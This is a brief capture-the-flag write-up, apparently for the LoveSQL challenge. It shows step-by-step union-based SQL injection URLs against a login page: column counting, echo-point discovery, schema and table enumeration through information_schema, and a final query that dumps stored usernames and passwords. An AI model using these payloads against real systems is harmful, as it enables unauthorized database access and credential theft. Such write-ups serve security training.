Title address: https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]LoveSQL
The universal password login is successful, confirm that there is an injection point
order by
Judge the number of fields
/check.php?username=mochu7'order by 3%23&password=admin
Make sure the number of fields is 3, check the echo point
/check.php?username=mochu7'union select 1,2,3%23&password=admin
Query the current database and all databases
/check.php?username=mochu7'union select 1,database(),group_concat(schema_name) from information_schema.schemata%23&password=admin
information_schema
mysql
performance_schema
test
geek
Query geek
a table in the database
/check.php?username=mochu7'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=admin
geekuser
l0ve1ysq1
geek.l0ve1ysq1
Field name under the query table
/check.php?username=mochu7'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=admin
id
username
password
Query all contents of the field
/check.php?username=mochu7'union select 1,2,group_concat(id,'---',username,'---',password) from geek.l0ve1ysq1%23&password=admin